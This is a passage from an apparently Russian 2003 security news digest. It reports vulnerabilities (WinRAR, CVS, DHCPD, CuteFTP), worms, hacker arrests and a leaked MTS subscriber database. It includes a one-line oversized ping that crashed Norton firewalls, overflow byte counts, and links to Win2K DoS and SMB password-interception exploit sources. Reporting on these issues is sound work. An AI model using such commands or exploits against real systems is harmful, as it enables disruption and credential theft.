Компания iDEFENSE сообщает об уязвимости в пакете драйверов принтеров в дистрибутиве Linux Mandrake, а именно в бинарниках: mtink, escputil, ml85p. Уязвимость во всех трёх компонентах позволяет локально получить права суперпользователя. Обнаружено в версии Mandrake 9.0 в printer-utils-1.0-76mdk и printer-filters-1.0-76mdk. MandrakeSoft выпущены новые версии пакетов. Подробности - http://www.idefense.com/advisory/01.21.03.txt
23/01/2003 13:13 Уязвимость в WinRAR.
Некто nesumin (nesumin@softhome.net) сообщает об обнаружении возможности переполнении буфера в популярном пакете работы с архивными файлами WinRAR. В случае задания очень длинного имени файла внутри архива (больше 256 байт) возникает переполнения буфера в стеке с возможностью выполнения произвольных команд в системе. Так как WinRAR выпускается для Win-подобных ОС, последствия очевидны. Также очевидно то, что подобная уязвимость может быть использована вирусо/черве-писателями. Уязвимыми оказались английские (и японские) версии 2.90, 3.00, 3.10. Господин Евгений Рошаль из RARLab (помимо WinRAR, выпускают также популярный файловый менеджер FAR) выпустил версию WinRAR 3.11, в которой уязвимости нет. WinRAR 3.11 - http://www.rarlab.com/download.htm
23/01/2003 12:33 Уязвимость в CVS.
Немецкая группа e-matters GmbH сообщает об обнаружении уязвимости в ПО системы контроля версий CVS (Concurrent Versions System). Была обнаружена ошибка в обработке запросов директории (Directory request), используя которую удалённый атакующий получает возможность выполнения произвольного кода на CVS-сервере, который по умолчанию запускается через демон inetd с полномочиями суперпользователя (root). Кроме того, указывается, что протокол CVS cодержит команды Update-prog и Checkin-prog, позволяющие пользователю с полномочиями записи в репозитарий файлов запустить произвольные команды оболочки на сервере. Уязвимость обнаружена в версиях ниже 1.11.4. Производителем выпущена новая версия, многие производители дистрибутивов также выпустили собственные версии CVS. Подробности - http://security.e-matters.de/advisories/012003.html
23/01/2003 11:48 Уязвимость в PeopleSoft.
Дейв Ахмад (Dave Ahmad) из Internet Security Systems, Inc. cообщает о наличии уязвимости в ПО PeopleSoft Application Messaging Gateway. ПО PeopleSoft предназначено для управления бизнес-проектами, в свою очередь PeopleSoft Application Messaging Gateway предназначено для обеспечения ПО Вэб-интерфейсом, а также связи и синхронизации между PeopleSoft-продуктами. Application Messaging Gateway по умолчанию сконфигурирован таким образом, что он запускается автоматически и доступен в качестве Java-сервлета. Злоумышленник может запустить XXE(XML External Entities) - атаку для получения доступа к любому файлу на уязвимой системе в контексте безопасности Вэб-сервера. Соответственно, это может привести к утечке важной коммерческой информации. Уязвимыми оказались все компоненты PeopleSoft версии 8.1x-8.19. Версия 8.4 не подвержена уязвимости. Подробности - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21811
23/01/2003 10:23 Объемы интернет-мошенничества продолжают расти
Интернет оказался первым источником мошенничества в списке ежегодного отчета Федеральной комиссии США по торговле (FTC), получив первое место по 10 категориям преступлений. 47% всех мошенничеств, не связанных с кражей номеров кредитных карт и других реквизитов, произошли в интернете, что на 31% выше, чем в 2000 году. Что же касается кражи реквизитов ("identity theft"), то здесь интернет был всегда впереди, однако по сравнению с 2001 годом количество случаев выросло с 220 тысяч до 380, а в денежном выражении - со $160 млн. до $343 млн. А вот и первая десятка излюбленных мест для мошенников: интернет-аукционы (13% от всех жалоб); компьютерные и интернет-услуги (6%); займы со льготными процентами и защита кредитов (5%); доставка покупок на дом / продажи по каталогам (5%); заграничные денежные предложения (4%); призы и лотереи (4%); предложение удаленной работы и бизнеса (3%); телефония (2%); здравоохранение (2%); журналы и клубы покупателей (2%). Источник - http://www.cnews.ru
22/01/2003 15:11 Задержан хакер, взломавший систему Western Union.
преступника, задержанного в понедельник полицией Рима, можно назвать первым хакером, взломавшим Western Union. Злоумышленник, являющийся гражданином Румынии, использовал фальшивые документы для получения переводов на других лиц. В МВД Румынии заявили, что вору удалось выкрасть не менее 150 тысяч евро. Преступник проник в картотеку центрального компьютера компании и регулярно воровал оттуда необходимую информацию. Как передает РИА "Новости", при знании секретного кода получение денег требовало лишь предъявления документов на имя получателя, которые "умелец" подделывал с завидным постоянством. Преступник орудовал по всей Италии и попался лишь по той причине, что служащий одного из банков узнал в нем клиента, которому он недавно выдавал перевод, но под другим именем. Источник - http://www.rian.ru
22/01/2003 14:23 Британский хакер сел в тюрьму на два года за написание вирусов.
Лондонский суд признал виновным 22-летнего хакера Саймона Вэллора по обвинению в создании и распространении трех компьютерных вирусов. В конце декабря Вэллор, живущий в небольшом курортном городке Лландудно на северо-западе Уэльса, признал себя виновным, и теперь суд окончательно решил его судьбу. Ближайшие два года вирусописатель проведет за решеткой. Помимо написания вирусов Вэллор был диск-жокеем и веб-дизайнером. В период с декабря 2001 по январь 2002 гг. он написал и начал распространение трех вирусов: Gokar, Admirer и Redesi 2, которые рассылались по электронной почте и заразили десятки, а возможно, и сотни тысяч компьютеров по всему миру. Заразные письма хакер маскировал под обычные послания, признания в любви, рекламные сообщения и картинки с Винни-Пухом. Выследить злоумышленника удалось агентам ФБР, которые и сообщили британской полиции о преступлениях Вэллора. По словам судьи Джеффри Ривлина, люди, подобные Вэллору, являются не обычными компьютерными энтузиастами, а настоящими преступниками, которых чрезвычайно трудно обезвредить. Источник - http://www.afp.com/
22/01/2003 11:01 Начало приёма статей на RAID 2003.
Joshua Haines из лаборатории Линкольна Массачусетского Технологического Института (MIT) объявил о начале приёма статей и докладов, предназначенных для проходящего 8-10 сентября 2003 г. 6 Симпозиума RAID 2003 (Recent Advances in Intrusion Detection - что можно перевести (по смыслу) как "последние досстижения в системах определения вторжения (сетевого)"). Симпозиум пройдёт в г. Питтсбург, штат Пенсильвания, США. Как следует из названия, симпозиум будет посвящён последним достижениям в области технологий определения вторжения и нарушения целостности компьютерных систем, а также перспективам развития этого направления сетевой безопасности. Из основных тем, рассматриваемых форумом можно выделить: качественный, количественный анализ существующих IDS и их классификация; взаимодействие и интеграция существующих IDS; IDS в высокопроизводительных системах реального времени; классификация и анализ существующих уязвимостей и атак и т.д. Те, кто чувствует себя достаточно компетентными в данной области компьютерной безопасности, могут подавать статьи для предварительного анализа. Сайт RAID 2003 - http://www.raid-symposium.org/raid2003
22/01/2003 10:23 По сети распространяется вирус-антивирус.
Вирусы постепенно вошли в число привычных для пользователей Сети неприятностей, которые у опытных интернетчиков почти не вызывают особых эмоций. Однако вирус, распространяющийся в последние дни, вряд ли можно назвать обычным. Он охотится за другой вредоносной программой - Yaha. Казалось бы, пользователи должны радоваться - вирусы уничтожают друг друга. Однако расслабляться не стоит - специалисты предупреждают: в этой войне может пострадать ваш компьютер. Новый вирус W32.Sahay.A@mm распространяется по электронной почте в виде приложения к письму с заголовком "Fw: Sit back and be surprised". Приложенный файл называется mathmagic.scr. Вирус пытается самостоятельно приписаться ко всем .exe-файлам в папках Windows и C:\Program Files\Mirc\download, однако из-за багов в программном обеспечении он может повредить эти или другие файлы, хранящиеся на компьютере. Вирус сканирует компьютер в поисках червей W32.Yaha, и если ему удается найти червь этого семейства, Sahay его стирает. При этом на экране появляется сообщение с заголовком: "Exchange viruses?" (Поменять вирусы?). В сообщении говорится о том, что компьютер был инфицирован Yaha.k, автор которого нанес вред сайту автора Sahay, так что тот решил "продезинфицировать" ваш компьютер, заменив Yaha на другой вирус - Win32.HLLP.YahaSux. Новый вирус автоматически рассылается по контактам адресной книги Outlook и перезагружает машину. Источник - http://www.cnews.ru
22/01/2003 09:40 Уязвимость в Solaris.
В бюллетене по безопасности Sun Microsystems 46944 сообщается о наличии локальной и удалённой уязвимости в ОС Solaris, обнаруженной в службе удалённого вызова процедур RPC. При обработке RPC-запросов с применением механизма AUTH_DES-идентификации, мандаты AUTH_DES могут остаться в стеке памяти, что теоретически позволяет злоумышленнику получить к ним доступ. Детали уязвимости не раскрываются. Сообщается о наличии уязвимости в версиях Solaris для платформ SPARC и Intel: 2.5.1, 2.6 и 7. Версии 8 и 9 уязвимости не подвержены. Для всех версий ОС выпущены соответствующие патчи. Подробности - http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F46944
22/01/2003 00:53 Недельный отчет о вирусах от Panda Software.
Недельный отчет Вирусной лаборатории компании Panda Software посвящен следующим червям - версиям "N" и "O" червя Opaserv, а также червям Horo, Sahay и троянцу Trj/W32.Sevic. Opaserv.N и Opaserv.O распространяются через сетевые диски, используя брешь в системе парольной защиты операционных систем Windows Me/98/95. Для попадания на другие компьютеры версия "N" изменяет определенные записи в Системном реестре и создает некоторые файлы на зараженном компьютере. Кроме того, программа пытается получить доступ к сетевым дискам, находящимся в той же сети, что и зараженный компьютер, а также установить соединение со случайными IP адресами. Opaserv.O активируется 24 декабря 2002 или позднее. После активации червь удаляет всю информацию в CMOS (BIOS), а также все содержимое жесткого диска. Заразив очередной компьютер, червь перезагружает его и выводит на экран сообщение, содержащее информацию об установленной версии Windows. Полный отчёт - http://www.viruslab.ru/press/index.php?go=show&num=103
22/01/2003 00:32 Статья "Распределение трафика между каналами в FreeBSD".
На сайте opennet.ru объявляется о выходе статьи о том, как реализовать работу через два независимых интернет канала, используя трансляцию адресов и полиси роутинг (NAT + ipfw fwd). Статья - http://www.artmagic.ru/labs/short/2-channels-managment-FreeBSD.shtml
22/01/2003 00:24 Заплата для Squid.
Вышла оригинальная заплата для популярного прокси-сервера Squid 2.5STABLE1, которая журналирует tcp_outgoing_adress, как сообщается на сайте www.lrn.ru Ccылка на патч - ftp://linux.tomsk.ru/pub/Linux/Network/Proxy/Squid/patch/tcp_outgoing_adress_logining.patch.gz
22/01/2003 00:03 Выход второго номера журнала "Системный администратор".
18 января №1(2) журнала "Системный администратор" вышел из печати. Отныне он будет издаваться ежемесячно. В номере: -работа SAMBA вместо PDC в статье Андрея Гуселетова "Создание PDC (основного контроллера домена) для Windows на базе SAMBA 2.2.5". -Вопросы безопасности передаваемых по сети данных решает в "Теории и практике OpenSSL" Всеволод Стахов. -Александр Потемкин делает общий обзор наиболее часто применяемых техник компьютерных атак и защиты от них. -Заглянуть "внутрь" простого брандмауэра и совершить путешествие по его исходному коду предлагает Владимир Мешков. Журнал "Системный администратор" является участником VIII международного форума Технологии безопасности, который будет проходить 4 - 7 февраля 2003г. в Москве, ВВЦ, павильон № 57. На форуме будут представлены октябрьский (№1) и январский (№1(2)) номера журнала. Подробнее о журнале - http://www.samag.ru
21/01/2003 12:14 ISS представила новую модель корпоративной безопасности.
Как сообщает eWeek, в прошлый четверг фирма Internet Security Systems Inc. (крупнейший исследователь компьютерной безопасности и производитель соответствующего ПО) представила новую стратегию корпоративной безопасности под названием Dynamic Threat Protection. Целью этой стратегии является объединение всей сети в единую систему защиты с управлением на центральном сервере. Ядром подобной системы является RealSecure Site Protector 2.0, сосредотачивающий всё управление безопасностью сети на одной машине. На остальных объектах защищаемой сети (серверы, десктопы, лэптопы и т.д.) устанавливаются RealSecure агенты, управляемые с центрального сервера. Подробности - http://www.eweek.com/article2/0,3959,832820,00.asp
21/01/2003 11:32 Что может удивить Кевина Митника в Интернет?
Cybervlad с bugtraq.ru нашёл довольно любопытную ссылку, в которой приводится мнение о том, что могло бы удивить Кевина Митника после 8 лет отсутствия в Интернете. По мнению обозревателя SecurityNewsPortal, Митника могут очень удивить следующие изменения: - Ссылки на хакерские сайты всегда ведут на порносайты... - Ссылки на сайты с пиратским софтом всегда ведут на порносайты... - Ссылки на сайты с кряками для игр и утилит всегда ведут на порносайты... - Поисковые системы выдают рекламу вместо результатов поиска... - Patriot Act приравнял хакеров к террористам... - Толпы проходимцев пытаются продать средство для увеличения пениса... Более подробно - http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?dat
21/01/2003 10:55 Выход Apache 2.0.44
Apache Software Foundation объявила о выпуске новой версии популярного Web-сервера Apache ветви 2.0. Из основных улучшений: улучшение стабильности конфигурации и интерефейсов дополнительных подключаемых модулей. Для обновления с версий 2.0.42 не требуется изменений в конфигурации и модулях. Кроме того, устранены три уязвимости, обнаруженные в различное время в версии 2.0.43 (в версиях для ОС Windows), а также исправлены различные баги. Подробности - http://www.apache.org/dist/httpd/Announcement2.html
21/01/2003 10:31 Базу данных абонентов МТС "рассекретили".
Уже около недели любой желающий может обзавестись базой данных абонентов компании "Мобильные ТелеСистемы" (МТС). Личную информацию миллионов людей продают за 2000 рублей и меньше, пишет сегодня газета "Ведомости". В МТС ведется расследование этого инцидента: по одной из рабочих версий, секретная информация "утекла" из компании через спецслужбы. База данных МТС, предлагаемая сейчас пиратами, содержит такие персональные сведения об абонентах компании: ФИО, дата рождения, паспортные данные, адрес места жительства, ИНН, ОКОНХ, юридический адрес, контактный телефон (не мобильный), дата подписания контракта с МТС, прошедшие платежи. В базе реализован поиск по первым семи позициям. "По факту утечки информации МТС провела внутреннее следствие, - говорит пресс-секретарь "Мобильных ТелеСистем" Ева Прокофьева. - Похищена только часть базы данных, т. е. (у пиратов оказались - прим. издания) не все данные об абонентах и не все абоненты компании. К сожалению, по формату похищенной части базы данных невозможно определить источник утечки". Как велика похищенная часть базы, в МТС не сообщают. По одной из версий компании, базы данных "утекли" во время октябрьской операции по освобождению заложников из театрального центра на Дубровке. Тогда сотовые операторы отключили на своих сетях функцию шифрования разговоров и открыли спецслужбам доступ к своей базе данных, сообщают "Ведомости". Прим. от ньюсмейкера - в нижней ссылке приведён как раз пример подобного предложения - некий Борис Дмитриевич (mts@pochtamt.ru) предлагает подобную базу всего за 350 американских рублей, но без торга. ;) Источник - http://www.securitylab.ru Пример предложения - http://www.myguestbook.ru/?supertop
21/01/2003 10:14 Уязвимость в ISC DHCPD.
Выпущен бюллетень CERT CA-2003-01, описывающий уязвимость в ISC DHCPD - инструменте от фирмы Internet Software Consortium (ISC), реализующем функции протокола DHCP (Dynamic Host Configuration Protocol). DHCP, как следует из описания RFC 2131 предназначен для динамического формирования сетевых параметров клиентских станций в TCP/IP сети. В ISC DHCPD также предусмотрена возможность динамического обновления базы данных DNS-сервера при помощи опции NSUPDATE. Разработчики из ISC при анализе исходного кода обнаружили множественные уязвимости в механизме переключения подпрограмм библиотекой minires, которую, в свою очередь, использует NSUPDATE при разрешении доменных имён. Используя эту уязвимость, атакующий может вызвать переполнение буфера в стеке при посылке DHCP-пакета, содержащего длинное имя хоста. Как пишет CERT, на момент выхода бюллетеня ничего о выходе эксплоита известно не было. Производителями различных ОС выпущены обновления. Подробности - http://www.cert.org/advisories/CA-2003-01.html
21/01/2003 09:43 Совместная пресс-конференция Microsoft и ФАПСИ.
Представительство Microsoft в России и СНГ, Федеральное государственное унитарное предприятие "Научно-технический центр "Атлас" (НТЦ "Атлас") и Главное управление информационных ресурсов органов государственной власти Российской Федерации Федерального агентства правительственной связи и информации при Президенте Российской Федерации (ГУИР ФАПСИ) на cовместной пресс-конференции в Москве объявили о том, что по согласованию с ФАПСИ НТЦ "Атлас" подписал соглашение с корпорацией Microsoft об использовании исходного кода "в интересах повышения доверия к программным продуктам корпорации Microsoft, применяемым в органах государственной власти Российской Федерации". Программа GSP распространяется на исходные коды операционных систем Windows 2000, Windows XP, Windows CE и Windows Server 2003, которую планируют выпустить в апреле этого года. В списке возможных участников Government Security Program - 60 стран, которые, как надеются в Microsoft, подпишут соглашения о сотрудничестве. В настоящий момент в программе участвует Россия и НАТО, и более чем в 20 странах, включая Китай, Францию и США, корпорация ведет переговоры об участии. Подписанное в рамках инициативы GSP соглашение не требует оплаты и позволяет получать доступ к исходному коду Windows различным российским государственным организациям, благодаря чему они смогут проанализировать этот код с различных точек зрения и верифицировать надежность платформы Microsoft в соответствии с различными системами сертификации. Координатором в этом вопросе будет выступать НТЦ "Атлас". Источник - http://www.cnews.ru
21/01/2003 09:24 Новые вирусы в энциклопедии "Лаборатории Касперского".
Как сообщает сайт "Лаборатории Касперского" их вирусная энциклопедия пополнилась сразу пятью новыми вирусами: Joke_JS.Spawn.b, Worm.Win32.Grexon, Trojan.VBS.StartPage, Macro.Word97.Swatch.b, Win32.Ditex. Из последних особенно примечателен вирус Joke_JS.Spawn.b. После запуска Java-скрипта, который содержится внутри html документа, у пользователя начинает произвольно передвигаться по экрану окно Internet Explorer. Кроме этого, происходит самопроизвольное открытие в фоновом режиме еще нескольких окон IE. Вирус-червь Grexon распространяется по локальной сети. Копирует себя на все логические диски, начиная с диска C: и на сетевые диски. Размер червя - около 7K. При старте червь копирует себя под именем "grex.exe" во временный каталог Windows и регистрирует этот файл в системном реестре в ключе авто-запуска: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Grex = %TempDir%\grex.exe. Более подробно - http://www.viruslist.com/index.html?tnews=1003&id=1675890
21/01/2003 08:44 Эксплоит для Win2K.
Шведско-норвежской группой telhack inc выпущен эксплоит, позволяющий удалённо повесить сервер с установленной ОС Win2K c установленным на порту 445 (ms-ds служба) сервером LanMan. Программа всего-навсего бомбардирует 445 порт (TCP или UDP) NULL-пакетами длиной 10К. Уязвимость была ранее обнаружена группой KPMG из Дании. Исходник - http://217.215.43.33/Zeromatic/telhack.tk/filer/ms-ds-xploit.c
20/01/2003 17:48 Кевину Митнику разрешили пользоваться интернетом.
На этой неделе истекает срок пребывания под наблюдением самого известного в мире хакера Кевина Митника. После нескольких лет он, наконец, получит возможность использовать компьютеры для работы в интернете. Впервые после долгого перерыва выйти в Сеть Митник планирует в студии передачи Screen Savers канала TechTV. Вместе с хакером в студии будут присутствовать основатель Napster Шон Фэннинг и один из основателей Apple Стив Возняк. По окончании запрета на пользование интернетом, Митник планирует работать в качестве эксперта по компьютерной безопасности. Хакер утверждает, что одной из главных проблем для него станет убедить людей в том, что не все, что о нем написано - правда. В ближайшем будущем хакер планирует начать самостоятельно пользоваться электронной почтой - до этого письма приходилось получать близким Митника, которые распечатывали их и передавали хакеру. Против Митника продолжает действовать единственное ограничение - запрет на использование своей истории в коммерческих целях до 2010 года. Источник - http://www.compulenta.ru
20/01/2003 17:16 Письма, которые нам пишут.
Каждый из людей, работающих в Интернет получает письма по электронной почте. Зачастую это бывает всем нам знакомый спам, к которому мы привыкли, как к периодическому и неизбежному гололёду на улице и попросту удаляем подобные письма из почтового ящика (если нам не повезло с админом почтового сервера :)). Однако есть и другая категория писем, которая приходит к тем, кто разбирается в программировании и сетевой безопасности. Эти письма зачастую содержат информацию с предложениями работы, связанной со взломом защищённых (и не защищённых) сетей, программированием троянов и вирусов. Подобные письма поступают и к членам команды UINC. Особенно настораживает то, что в последнее время количество подобных писем возросло. Если вы внимательно читаете наши новости - мы писали недавно об активизации в стране отделов "К" (бывших "Р"). Возможно, что совпадение случайно, однако возникает подозрение, что подобным образом господа в "серых мундирах" решили выполнить план по раскрытию "компьютерных преступлений" и прибегают к подобным провокациям, чтобы обнаружить потенциальных жертв для последующей разработки. Приведу пример подобного письма (орфография и т.д., как пишут в подобных случаях, автора послания): "Привет, Я предлагаю поучавствовать в интересном проекте по взлому сетей с серьёзными фаерволлами. Нам требуется кодер и человек с хорошими навыками хака. Проект долгосрочный и достаточно серьёзный поэтому нам интересны тех. грамотные и ответственные люди способные к самостоятельной работе. Вся работа хорошо оплачивается... (пропущены требования к потенциальному кандидату - программирование etc.) ... Также мы готовы купить доступ к Американским компаниям, в которых больше 40 работников". Это письмо было получено от господина "John Do" <dimention@mail.ru>. Почта посылалась через Web-интерфейс сервера mail.ru. IP-адрес отсылавшего - 65.92.7.45 (предлагаем вам самим посмотреть, какой он сети принадлежит - хотя это ничего и не значит). Также подобные письма были получены в разное время с почтового адреса - caesar <caesar@msx.ru> (IP - 64.217.227.179, который естественно, не соответствует реверсному лук-апу msx.ru - о чём честно сообщает почтовый сервер) и других. Уважаемые господа! Хотелось бы подчеркнуть, что НАША команда (UINC) не занимается всякой грязью, типа хакерства и взлома! Мы занимаемся исключительно сетевой безопасностью! Не тратьте понапрасну Ваше и наше время! Хотелось бы также отметить одно из мест в подобном послании "..опыт в распространии троянов и апликаций по работе с емейлом". Ап(п)ликациями мы тоже не занимаемся! :) Источник - Команда UINC
20/01/2003 14:42 Статья "Honeypot в действии".
Очередной очень качественный перевод Михаила Разумова опубликован на сайте securitylab.ru. Посвящён он Honeypot ((дословно - горшок меда, по сути - компьютер, являющийся приманкой для атак). Цель статьи - поделиться с Интернет-сообществом данными, собранными с honeypot-сервера. Существует множество статей, объясняющих, как установить honeypot и риск, связанный с их использованием. Хотя эта статья поверхностно затронет эти темы, написана она для людей, которые хотят понять, что же за данные предоставляет им honeypot. Она включает в себя разведку хакера, попытку маскировки и повод для атаки honeypot. Рекомендуем ознакомиться специалистам по компьютерной безопасности, связанным тем или иным образом с анализом типичных действий взломщиков. Статья - http://www.SecurityLab.ru/?ID=35448
20/01/2003 13:31 Эксплоит middle2.c.
На сайте packetstorm выложен эксплоит, представляющий собой фактически MITM (Man In The Middle - атака путём внедрения "посредника" в легальное соединение). Как пишет сам автор, ledin из Encephalon-Zero, программа реализует алгоритм, описанный в статье "SMB/CIFS by root", описанный в 60-м номере журнала PHRACK. Внедряясь в легальное соединение при помощи этой программы, "исследователь" :) перехватывает весь траффик и получает декодированные пароли для доступа к SMB-серверу. Исходник предназначен для ОС Linux и требует для полноценной работы наличия библиотека libnet и lipcap (ссылки на которые приведены). После запуска программы она ожидает запроса на установление SMB-сессии со стороны клиента и, вклиниваясь в канал клиент-сервер, получает и затем декодирует зашифрованные пароли SMB-сессии. Кстати, в нашем форуме один из посетителей спрашивал об алгоритме формирования NTLM-хеша. Внутри исходника этот алгоритм можно увидеть в функции SMBencrypt(). Исходник - http://packetstorm.linuxsecurity.com/0301-exploits/middle2.c.gz
20/01/2003 11:50 Онлайновая помощь по *NIX опытных админов.
Сайт LOR (linux.org.ru) сообщает о создании сети E-Security, призванной соединить большую часть русскоязычных пользователей, заинтересованных в решении проблем сетевой безопасности, а также всегда готовых помочь тем, кто обратится за советом по *NIX системам или безопасности. Попасть в сеть можно, используя следующие IRC-серверы (естественно, при помощи IRC-клиента): irc.linux.by:6667 (ssl.irc.linux.by:6669 - ssl support), irc2.e-security.ru:6667, irc.unixgods.net:6667. Cписок всех серверов доступен по команде /map или /links. В данный момент в сети не так уж и много различных каналов, но уже сейчас интенсивно идет подключение новых серверов и пользователей, заинтересованных в развитии и поддержании этой сети. Как и в других больших сетях, присутствуют стабильные сервисы, облегчающие повседневную рутину и обеспечивающие в сети надлежащую безопасность. Источник - http://linux.org.ru
20/01/2003 11:10 Пентагон сделает свои сайты бесполезными для террористов.
Госсекретарь США по обороне Дональд Рамсфельд приказал веб-мастерам военной интернет-зоны ".mil" очистить сайты от информации, потенциально полезной для террористов. Речь идет о публично доступных страницах, поскольку материалы "для служебного пользования", не говоря уже о секретных, по инструкции Пентагона вовсе запрещено помещать в интернете. Ресурсы министерства обороны США, по словам Рамсфельда, занимают в Сети около 700 мегабайт. Стивен Афтергуд, директор проекта по безопасности в правительственных учреждениях при Федерации американских ученых (FAS), сказал, что "почти вся информация может быть полезна врагу в некотором роде. Если следовать такой логике, то придется полностью убрать почти все материалы". По его мнению, к этому вопросу надо подходить с позиции разумных ограничений. Подробности - http://online.securityfocus.com/news/2062
20/01/2003 10:42 Microsoft выпустила ПО для обеспечения защиты данных на компакт-дисках.
Microsoft сообщила 18 января о выпуске нового ПО для защиты авторских прав, которое должно помочь студиям звукозаписи контролировать несанкционированное копирование компакт-дисков, что является самой большой проблемой в музыкальной индустрии. В прошлом году несколько находчивых программистов-энтузиастов взломали собственную технологию защиты компании Sony Music. Компания Microsoft надеется, что, возможно, нашла решение. Новое ПО названо Windows Media Data Session Toolkit. Оно позволяет звукозаписывающим компаниям располагать песни на лицензионных компакт-дисках в несколько слоев, один из которых позволяет нормально воспроизводить записи на стерео и ПК. Слой для ПК, содержащийся в цифровом виде на защищенном диске, может быть модифицирован музыкальным издателем так, что он может, например, помешать перезаписи песен на другой компакт, рассказал Дэвид Фестер (David Fester), генеральный менеджер по цифровым медиаразвлечениям в Microsoft. Источник - http://www.cnews.ru
20/01/2003 10:23 Уязвимость NIS 2003.
Как сообщает некий Pavel P. из Чехии, им была обнаружена интересная "особенность" в Norton Internet Security 2003, установленном на его WinXP с SP1. При посылке длинного ICMP эхо-запроса большой длины на свою машину (ака 'ping "My IP" -l 65500') машина немедленно коредампилась с любимым сердцу любого хакера "синим экраном". В ответе автору письма Symantec Corp. констатировала, что подобная уязвимость имеет место быть во всех пакетах, входящих в состав Norton Personal Firewall: Norton Personal Firewall 2003, Norton Internet Security 2003, Norton Internet Security 2003 Professional Edition. При посылке очень длинного пакета ICMP эхо-запроса системы, на которых установлены вышеупомянутые пакеты, падают. Причём, уязвимость присутствует только в ОС Win2K и WinXP, в остальные версиях Windows уязвимости нет. Однако подобная уязвимость может быть использована только локальным пользователем, вошедшим в систему, что существенно ограничивает использование бага. Тем не менее, Symantec Corp. обновила все версии файрволлов и рекомендует пользователям обновить их с сайта через LiveUpdate. Подробности - http://securityresponse.symantec.com/avcenter/security/Content/2003.01.17.html
19/01/2003 17:03 Сотрудник RIAA сказал: "Мы глушили P2P-сети".
Как сообщает slashzone.ru, Maxwell'sSilverART пишет: "Сайт The Register разместил у себя интервью с работником международного департамента RIAA Мэтью Варном. Он подтвердил, что помогал RIAA распространять помехи в P2P-сетях, мешая отдельным пользователям соединяться друг с другом и "глуша" передаваемые данные с помощью шума. RIAA использовало несколько DSL-соединений, чтобы создать иллюзию присутствия нескольких пользователей и скрыть отправителя пересылаемых файлов. Работа группы Мэтью остановлена, однако он заявил, что крупные звукозаписывающие компании продолжают заниматься этим самостоятельно." В борьбе за авторские права все методы хороши? Довольно оригинально RIAA понимает борьбу за права звукозаписывающих компаний, не находите? Источник - http://www.theregister.co.uk/content/6/28919.html
19/01/2003 16:38 Русское зеркало chkrootlit.com.
Как сообщает сайт opennet.ru, появилось Русское зеркало сайта www.chkrootkit.com. На данный момент доступен только русский интерфейс к сайту, в будущем будет форум, подробные статьи на тему борьбы с trojan, worms под unix. Сайт - http://ru.chkrootkit.com/
19/01/2003 16:12 Вышел FreeBSD 5.0-RELEASE!
Вот и вышел новый, давно обещанный релиз популярной операционной системы FreeBSD 5.0! На FTP-сервере FREEBSD.ORG выложены исходники. Необходимо отметить, что на официальном WWW-сервере компании новости о выходе нового релиза пока нет. Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/5.0-RELEASE/
19/01/2003 15:32 Уязвимость в CuteFTP.
Lance Fitz-Herbert (aka phrizer) сообщает об обнаружении уязвимости в популярном FTP-клиенте CuteFTP. Обнаружена в версии 5.0 XP, build 50.6.10.2. Суть уязвимости заключается в том, что результат выполнения на сервере клиентом команды 'LIST' (запрос на выдачу содержимого текущей директории сервера) передаётся через канал передачи данных (FTP-сессия обеспечивается двумя каналами: данных и команд (порты 20/TCP, 21/TCP)). Послав 257 байт по этому каналу, сервер вызовет на стороне клиента переполнение буфера, а при посылке 260 байт произойдёт полная перезапись содержимого регистра EIP. Таким образом, атакующий, модифицировав соответствующим образом работу своего FTP-сервера, и каким-либо образом завлекший жертву с клиентом CuteFTP на свой сервер, может получить полный контроль над машиной жертвы. Как пишет автор уязвимости, новая версия клиента CuteFTP ожидается 20 января. Источник - http://www.securityfocus.com
19/01/2003 14:49 Интернет может умереть уже в этом году.
2003 год может стать последним годом существования интернета в привычном нам всем виде. Смерть Всемирная паутина примет от рук хакеров и вирусописателей. Таково мнение руководителя антивирусных исследований "Лаборатории Касперского" Евгения Касперского, которым он поделился с журналистами на пресс- конференции "Антивирусные итоги 2002 года". Проблему глобальной вирусной атаки на интернет создатели антивирусного программного обеспечения обсуждали еще в феврале прошлого года. Уже тогда специалисты считали, что в случае успеха хакеров и вирусописателей нам придется вернуться к почти забытым средствам получения информации вроде обычной почты, телефонов и телеграфа. Глобальное наступление на интернет будет представлять собой обычную DDoS-атаку, методы выполнения которой существуют в более чем достаточном количестве. При этом атаке будет подвергнут не какой-то конкретный сервер или конкретная сеть, а интернет в целом. Год назад мнения специалистов о сроках проведения массивного наступления хакеров и вирусописателей разделились примерно поровну. Одни считали, что первая глобальная интернет-атака произойдет в 2002 году, а другие полагали, что для достижения успеха организаторам атаки понадобится еще некоторое время. В итоге, правы оказались и те, и другие. Первая глобальная атака состоялась в 2002 году, но успехом при этом не увенчалась. В конце октября - начале ноября прошлого года глобальные интернет-серверы были атакованы, однако последствия этой атаки большинством пользователей остались незамеченными. Подробнее - http://vip.lenta.ru/bgcolor/2003/01/18/muerte/
19/01/2003 14:24 Американские программисты поразились изобретательности спамеров.
Несанкционированная рассылка электронной почты стала представлять для пользователей интернета существенную угрозу. К такому выводу пришли несколько сотен программистов, собравшихся на конференцию по борьбе со спамом в Массачусетском технологическом институте, сообщает Associated Press. Участники конференции отметили, что несмотря на все усилия разработчиков почтовых фильтров, отправители спама быстро находят способы обойти установленную защиту. "Это самая коварная вещь с которой я когда-либо встречался. Это гениально и сделано действительно умными людьми". Так прокомментировал один из участников конференции действия спамеров, которые для обхождения фильтров научились разбивать свои письма на части, а потом вновь собирать их в единое целое. Организаторы конференции полагали, что число ее участников не превысит 80 человек, однако в итоге в зале собралось несколько сотен программистов, хакеров и активных интернет- пользователей. Противники спама сравнили несанкционированную рассылку электронной почты с мелкими уличными преступлениями, которые не требуют тщательной подготовки и в то же время зачастую приносят их исполнителям немалую выгоду. Источник - www.lenta.ru Подробности - http://www.bayarea.com/mld/mercurynews/business/4977771.htm
18/01/2003 17:19 Cтатья " Установка sendamil с SMTP-авторизацией и проверкой на вирусы под FreeBSD".
На сайте opennet.ru опубликованы две русскоязычные статьи с пошаговым описанием установки и настройки под FreeBSD связок: Sendamil + DrWeb и Sendmail+авторизация SASL. Нам кажется, что подобные статьи будут представлять несомненный интерес для системных администраторов. Ссылки - http://www.opennet.ru/opennews/art.shtml?num=1981
18/01/2003 16:52 Заметка о cookie.
